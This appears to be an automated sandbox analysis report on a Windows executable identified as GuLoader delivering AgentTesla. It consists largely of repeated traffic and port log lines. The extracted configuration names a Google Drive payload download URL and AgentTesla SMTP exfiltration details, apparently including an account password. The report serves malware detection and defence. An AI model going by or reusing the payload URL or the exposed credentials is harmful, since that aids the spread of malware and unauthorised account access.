Click to jump to signature section
Source: 00000003.00000000.15477945295.0000000000BC0000.00000040.00000400.00020000.00000000.sdmp | Malware Configuration Extractor: GuLoader {"Payload URL": "https://drive.google.com/uc?export=download&id=1p1TrvkFKYHzlCDSRi8V2K0EcN7S0sk7E"} |
Source: conhost.exe.956.4.memstrmin | Malware Configuration Extractor: Agenttesla {"Exfil Mode": "SMTP", "SMTP Info": "titkarsag@ferdi.huQ1w2e3r4t5!mail.ferdi.hulucassevirus@gmail.com"} |
Source: FRACCIONAMIENTO 1722403906461L.exe | Virustotal: Detection: 27% | Perma Link |
Source: FRACCIONAMIENTO 1722403906461L.exe | ReversingLabs: Detection: 12% |
Source: FRACCIONAMIENTO 1722403906461L.exe | Static PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED |
Source: unknown | HTTPS traffic detected: 142.250.186.174:443 -> 192.168.11.20:49753 version: TLS 1.2 |
Source: unknown | HTTPS traffic detected: 142.250.186.97:443 -> 192.168.11.20:49785 version: TLS 1.2 |
Source: FRACCIONAMIENTO 1722403906461L.exe | Static PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT |
Source: C:\Users\user\Desktop\FRACCIONAMIENTO 1722403906461L.exe | Code function: 1_2_00405D74 CloseHandle,GetTempPathW,DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose, | 1_2_00405D74 |
Source: C:\Users\user\Desktop\FRACCIONAMIENTO 1722403906461L.exe | Code function: 1_2_0040290B FindFirstFileW, | 1_2_0040290B |
Source: C:\Users\user\Desktop\FRACCIONAMIENTO 1722403906461L.exe | Code function: 1_2_0040699E FindFirstFileW,FindClose, | 1_2_0040699E |
Source: Malware configuration extractor | URLs: https://drive.google.com/uc?export=download&id=1p1TrvkFKYHzlCDSRi8V2K0EcN7S0sk7E |
Source: global traffic | HTTP traffic detected: GET /uc?export=download&id=1p1TrvkFKYHzlCDSRi8V2K0EcN7S0sk7E HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoHost: drive.google.comCache-Control: no-cache |
Source: global traffic | HTTP traffic detected: GET /uc?export=download&id=1p1TrvkFKYHzlCDSRi8V2K0EcN7S0sk7E HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoHost: drive.google.comCache-Control: no-cache |
Source: global traffic | HTTP traffic detected: GET /uc?export=download&id=1p1TrvkFKYHzlCDSRi8V2K0EcN7S0sk7E HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoHost: drive.google.comCache-Control: no-cache |
Source: global traffic | HTTP traffic detected: GET /uc?export=download&id=1p1TrvkFKYHzlCDSRi8V2K0EcN7S0sk7E HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoHost: drive.google.comCache-Control: no-cache |
Source: global traffic | HTTP traffic detected: GET /uc?export=download&id=1p1TrvkFKYHzlCDSRi8V2K0EcN7S0sk7E HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoHost: drive.google.comCache-Control: no-cache |
Source: global traffic | HTTP traffic detected: GET /uc?export=download&id=1p1TrvkFKYHzlCDSRi8V2K0EcN7S0sk7E HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoHost: drive.google.comCache-Control: no-cache |
Source: global traffic | HTTP traffic detected: GET /uc?export=download&id=1p1TrvkFKYHzlCDSRi8V2K0EcN7S0sk7E HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoHost: drive.google.comCache-Control: no-cache |
Source: global traffic | HTTP traffic detected: GET /uc?export=download&id=1p1TrvkFKYHzlCDSRi8V2K0EcN7S0sk7E HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoHost: drive.google.comCache-Control: no-cache |
Source: global traffic | HTTP traffic detected: GET /uc?export=download&id=1p1TrvkFKYHzlCDSRi8V2K0EcN7S0sk7E HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoHost: drive.google.comCache-Control: no-cache |
Source: global traffic | HTTP traffic detected: GET /uc?export=download&id=1p1TrvkFKYHzlCDSRi8V2K0EcN7S0sk7E HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoHost: drive.google.comCache-Control: no-cache |
Source: global traffic | HTTP traffic detected: GET /uc?export=download&id=1p1TrvkFKYHzlCDSRi8V2K0EcN7S0sk7E HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoHost: drive.google.comCache-Control: no-cache |
Source: global traffic | HTTP traffic detected: GET /uc?export=download&id=1p1TrvkFKYHzlCDSRi8V2K0EcN7S0sk7E HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoHost: drive.google.comCache-Control: no-cache |
Source: global traffic | HTTP traffic detected: GET /uc?export=download&id=1p1TrvkFKYHzlCDSRi8V2K0EcN7S0sk7E HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoHost: drive.google.comCache-Control: no-cache |
Source: global traffic | HTTP traffic detected: GET /uc?export=download&id=1p1TrvkFKYHzlCDSRi8V2K0EcN7S0sk7E HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoHost: drive.google.comCache-Control: no-cache |
Source: global traffic | HTTP traffic detected: GET /uc?export=download&id=1p1TrvkFKYHzlCDSRi8V2K0EcN7S0sk7E HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoHost: drive.google.comCache-Control: no-cache |
Source: global traffic | HTTP traffic detected: GET /uc?export=download&id=1p1TrvkFKYHzlCDSRi8V2K0EcN7S0sk7E HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoHost: drive.google.comCache-Control: no-cache |
Source: global traffic | HTTP traffic detected: GET /uc?export=download&id=1p1TrvkFKYHzlCDSRi8V2K0EcN7S0sk7E HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoHost: drive.google.comCache-Control: no-cache |
Source: global traffic | HTTP traffic detected: GET /uc?export=download&id=1p1TrvkFKYHzlCDSRi8V2K0EcN7S0sk7E HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoHost: drive.google.comCache-Control: no-cache |
Source: global traffic | HTTP traffic detected: GET /uc?export=download&id=1p1TrvkFKYHzlCDSRi8V2K0EcN7S0sk7E HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoHost: drive.google.comCache-Control: no-cache |
Source: global traffic | HTTP traffic detected: GET /docs/securesc/ha0ro937gcuc7l7deffksulhg5h7mbp1/0al9jnh9ri2cnupcf3pilpptme4k7l2h/1650461475000/18066694053602596605/*/1p1TrvkFKYHzlCDSRi8V2K0EcN7S0sk7E?e=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoCache-Control: no-cacheHost: doc-0c-74-docs.googleusercontent.comConnection: Keep-Alive |
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49766 |
Source: unknown | Network traffic detected: HTTP traffic on port 49783 -> 443 |
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49764 |
Source: unknown | Network traffic detected: HTTP traffic on port 49779 -> 443 |
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49785 |
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49762 |
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49784 |
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49783 |
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49782 |
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49780 |
Source: unknown | Network traffic detected: HTTP traffic on port 49766 -> 443 |
Source: unknown | Network traffic detected: HTTP traffic on port 49785 -> 443 |
Source: unknown | Network traffic detected: HTTP traffic on port 49762 -> 443 |
Source: unknown | Network traffic detected: HTTP traffic on port 49764 -> 443 |
Source: unknown | Network traffic detected: HTTP traffic on port 49770 -> 443 |
Source: unknown | Network traffic detected: HTTP traffic on port 49776 -> 443 |
Source: unknown | Network traffic detected: HTTP traffic on port 49778 -> 443 |
Source: unknown | Network traffic detected: HTTP traffic on port 49753 -> 443 |
Source: unknown | Network traffic detected: HTTP traffic on port 49774 -> 443 |
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49779 |
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49756 |
Source: unknown | Network traffic detected: HTTP traffic on port 49755 -> 443 |
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49778 |
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49755 |
Source: unknown | Network traffic detected: HTTP traffic on port 49782 -> 443 |
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49776 |
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49753 |
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49775 |
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49774 |
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49773 |
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49771 |
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49770 |
Source: unknown | Network traffic detected: HTTP traffic on port 49784 -> 443 |
Source: unknown | Network traffic detected: HTTP traffic on port 49780 -> 443 |
Source: unknown | Network traffic detected: HTTP traffic on port 49768 -> 443 |
Source: unknown | Network traffic detected: HTTP traffic on port 49775 -> 443 |
Source: unknown | Network traffic detected: HTTP traffic on port 49773 -> 443 |
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49768 |
Source: unknown | Network traffic detected: HTTP traffic on port 49756 -> 443 |
Source: unknown | Network traffic detected: HTTP traffic on port 49771 -> 443 |
Source: global traffic | HTTP traffic detected: HTTP/1.1 403 ForbiddenContent-Length: 1103Content-Type: text/html; charset=UTF-8Date: Wed, 20 Apr 2022 13:29:23 GMTAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000,h3-Q050=":443"; ma=2592000,h3-Q046=":443"; ma=2592000,h3-Q043=":443"; ma=2592000,quic=":443"; ma=2592000; v="46,43"Connection: close |
Source: global traffic | HTTP traffic detected: HTTP/1.1 403 ForbiddenContent-Length: 1103Content-Type: text/html; charset=UTF-8Date: Wed, 20 Apr 2022 13:29:32 GMTAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000,h3-Q050=":443"; ma=2592000,h3-Q046=":443"; ma=2592000,h3-Q043=":443"; ma=2592000,quic=":443"; ma=2592000; v="46,43"Connection: close |
Source: global traffic | HTTP traffic detected: HTTP/1.1 403 ForbiddenContent-Length: 1103Content-Type: text/html; charset=UTF-8Date: Wed, 20 Apr 2022 13:29:41 GMTAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000,h3-Q050=":443"; ma=2592000,h3-Q046=":443"; ma=2592000,h3-Q043=":443"; ma=2592000,quic=":443"; ma=2592000; v="46,43"Connection: close |
Source: global traffic | HTTP traffic detected: HTTP/1.1 403 ForbiddenContent-Length: 1103Content-Type: text/html; charset=UTF-8Date: Wed, 20 Apr 2022 13:29:51 GMTAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000,h3-Q050=":443"; ma=2592000,h3-Q046=":443"; ma=2592000,h3-Q043=":443"; ma=2592000,quic=":443"; ma=2592000; v="46,43"Connection: close |
Source: global traffic | HTTP traffic detected: HTTP/1.1 403 ForbiddenContent-Length: 1103Content-Type: text/html; charset=UTF-8Date: Wed, 20 Apr 2022 13:29:56 GMTAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000,h3-Q050=":443"; ma=2592000,h3-Q046=":443"; ma=2592000,h3-Q043=":443"; ma=2592000,quic=":443"; ma=2592000; v="46,43"Connection: close |
Source: global traffic | HTTP traffic detected: HTTP/1.1 403 ForbiddenContent-Length: 1103Content-Type: text/html; charset=UTF-8Date: Wed, 20 Apr 2022 13:30:05 GMTAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000,h3-Q050=":443"; ma=2592000,h3-Q046=":443"; ma=2592000,h3-Q043=":443"; ma=2592000,quic=":443"; ma=2592000; v="46,43"Connection: close |
Source: global traffic | HTTP traffic detected: HTTP/1.1 403 ForbiddenContent-Length: 1103Content-Type: text/html; charset=UTF-8Date: Wed, 20 Apr 2022 13:30:15 GMTAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000,h3-Q050=":443"; ma=2592000,h3-Q046=":443"; ma=2592000,h3-Q043=":443"; ma=2592000,quic=":443"; ma=2592000; v="46,43"Connection: close |
Source: global traffic | HTTP traffic detected: HTTP/1.1 403 ForbiddenContent-Length: 1103Content-Type: text/html; charset=UTF-8Date: Wed, 20 Apr 2022 13:30:23 GMTAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000,h3-Q050=":443"; ma=2592000,h3-Q046=":443"; ma=2592000,h3-Q043=":443"; ma=2592000,quic=":443"; ma=2592000; v="46,43"Connection: close |
Source: global traffic | HTTP traffic detected: HTTP/1.1 403 ForbiddenContent-Length: 1103Content-Type: text/html; charset=UTF-8Date: Wed, 20 Apr 2022 13:30:29 GMTAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000,h3-Q050=":443"; ma=2592000,h3-Q046=":443"; ma=2592000,h3-Q043=":443"; ma=2592000,quic=":443"; ma=2592000; v="46,43"Connection: close |
Source: global traffic | HTTP traffic detected: HTTP/1.1 403 ForbiddenContent-Length: 1103Content-Type: text/html; charset=UTF-8Date: Wed, 20 Apr 2022 13:30:36 GMTAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000,h3-Q050=":443"; ma=2592000,h3-Q046=":443"; ma=2592000,h3-Q043=":443"; ma=2592000,quic=":443"; ma=2592000; v="46,43"Connection: close |
Source: global traffic | HTTP traffic detected: HTTP/1.1 403 ForbiddenContent-Length: 1103Content-Type: text/html; charset=UTF-8Date: Wed, 20 Apr 2022 13:30:41 GMTAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000,h3-Q050=":443"; ma=2592000,h3-Q046=":443"; ma=2592000,h3-Q043=":443"; ma=2592000,quic=":443"; ma=2592000; v="46,43"Connection: close |
Source: global traffic | HTTP traffic detected: HTTP/1.1 403 ForbiddenContent-Length: 1103Content-Type: text/html; charset=UTF-8Date: Wed, 20 Apr 2022 13:30:50 GMTAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000,h3-Q050=":443"; ma=2592000,h3-Q046=":443"; ma=2592000,h3-Q043=":443"; ma=2592000,quic=":443"; ma=2592000; v="46,43"Connection: close |
Source: global traffic | HTTP traffic detected: HTTP/1.1 403 ForbiddenContent-Length: 1103Content-Type: text/html; charset=UTF-8Date: Wed, 20 Apr 2022 13:31:00 GMTAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000,h3-Q050=":443"; ma=2592000,h3-Q046=":443"; ma=2592000,h3-Q043=":443"; ma=2592000,quic=":443"; ma=2592000; v="46,43"Connection: close |
Source: global traffic | HTTP traffic detected: HTTP/1.1 403 ForbiddenContent-Length: 1103Content-Type: text/html; charset=UTF-8Date: Wed, 20 Apr 2022 13:31:08 GMTAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000,h3-Q050=":443"; ma=2592000,h3-Q046=":443"; ma=2592000,h3-Q043=":443"; ma=2592000,quic=":443"; ma=2592000; v="46,43"Connection: close |
Source: global traffic | HTTP traffic detected: HTTP/1.1 403 ForbiddenContent-Length: 1103Content-Type: text/html; charset=UTF-8Date: Wed, 20 Apr 2022 13:31:17 GMTAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000,h3-Q050=":443"; ma=2592000,h3-Q046=":443"; ma=2592000,h3-Q043=":443"; ma=2592000,quic=":443"; ma=2592000; v="46,43"Connection: close |
Source: global traffic | HTTP traffic detected: HTTP/1.1 403 ForbiddenContent-Length: 1103Content-Type: text/html; charset=UTF-8Date: Wed, 20 Apr 2022 13:31:23 GMTAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000,h3-Q050=":443"; ma=2592000,h3-Q046=":443"; ma=2592000,h3-Q043=":443"; ma=2592000,quic=":443"; ma=2592000; v="46,43"Connection: close |
Source: global traffic | HTTP traffic detected: HTTP/1.1 403 ForbiddenContent-Length: 1103Content-Type: text/html; charset=UTF-8Date: Wed, 20 Apr 2022 13:31:32 GMTAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000,h3-Q050=":443"; ma=2592000,h3-Q046=":443"; ma=2592000,h3-Q043=":443"; ma=2592000,quic=":443"; ma=2592000; v="46,43"Connection: close |
Source: global traffic | HTTP traffic detected: HTTP/1.1 403 ForbiddenContent-Length: 1103Content-Type: text/html; charset=UTF-8Date: Wed, 20 Apr 2022 13:31:39 GMTAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000,h3-Q050=":443"; ma=2592000,h3-Q046=":443"; ma=2592000,h3-Q043=":443"; ma=2592000,quic=":443"; ma=2592000; v="46,43"Connection: close |
Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1 |
Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1 |
Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1 |
Source: CasPol.exe, 00000003.00000002.20397299424.000000001D33C000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: subdomain_match":["go","tv"]},{"applied_policy":"EdgeUA","domain":"video.zhihu.com"},{"applied_policy":"ChromeUA","domain":"la7.it"},{"applied_policy":"ChromeUA","domain":"ide.cs50.io"},{"applied_policy":"ChromeUA","domain":"moneygram.com"},{"applied_policy":"ChromeUA","domain":"blog.esuteru.com"},{"applied_policy":"ChromeUA","domain":"online.tivo.com","path_match":["/start"]},{"applied_policy":"ChromeUA","domain":"smallbusiness.yahoo.com","path_match":["/businessmaker"]},{"applied_policy":"ChromeUA","domain":"jeeready.amazon.in","path_match":["/home"]},{"applied_policy":"ChromeUA","domain":"abc.com"},{"applied_policy":"ChromeUA","domain":"mvsrec738.examly.io"},{"applied_policy":"ChromeUA","domain":"myslate.sixphrase.com"},{"applied_policy":"ChromeUA","domain":"search.norton.com","path_match":["/nsssOnboarding"]},{"applied_policy":"ChromeUA","domain":"checkdecide.com"},{"applied_policy":"ChromeUA","domain":"virtualvisitlogin.partners.org"},{"applied_policy":"ChromeUA","domain":"carelogin.bryantelemedicine.com"},{"applied_policy":"ChromeUA","domain":"providerstc.hs.utah.gov"},{"applied_policy":"ChromeUA","domain":"applychildcaresubsidy.alberta.ca"},{"applied_policy":"ChromeUA","domain":"elearning.evn.com.vn","path_match":["/login"]},{"applied_policy":"ChromeUA","domain":"telecare.keckmedicine.org"},{"applied_policy":"ChromeUA","domain":"authoring.amirsys.com","path_match":["/login"]},{"applied_policy":"ChromeUA","domain":"elearning.seabank.com.vn","path_match":["/login"]},{"applied_policy":"ChromeUA","domain":"app.fields.corteva.com","path_match":["/login"]},{"applied_policy":"ChromeUA","domain":"gsq.minornet.com"},{"applied_policy":"ChromeUA","domain":"shop.lic.co.nz"},{"applied_policy":"ChromeUA","domain":"telehealthportal.uofuhealth.org"},{"applied_policy":"ChromeUA","domain":"portal.centurylink.com"},{"applied_policy":"ChromeUA","domain":"visitnow.org"},{"applied_policy":"ChromeUA","domain":"www.hotstar.com","path_match":["/in/subscribe/payment/methods/dc","/in/subscribe/payment/methods/cc"]},{"applied_policy":"ChromeUA","domain":"tryca.st","path_match":["/studio","/publisher"]},{"applied_policy":"ChromeUA","domain":"telemost.yandex.ru"},{"applied_policy":"ChromeUA","domain":"astrogo.astro.com.my"},{"applied_policy":"ChromeUA","domain":"airbornemedia.gogoinflight.com"},{"applied_policy":"ChromeUA","domain":"itoaxaca.mindbox.app"},{"applied_policy":"ChromeUA","domain":"app.classkick.com"},{"applied_policy":"ChromeUA","domai |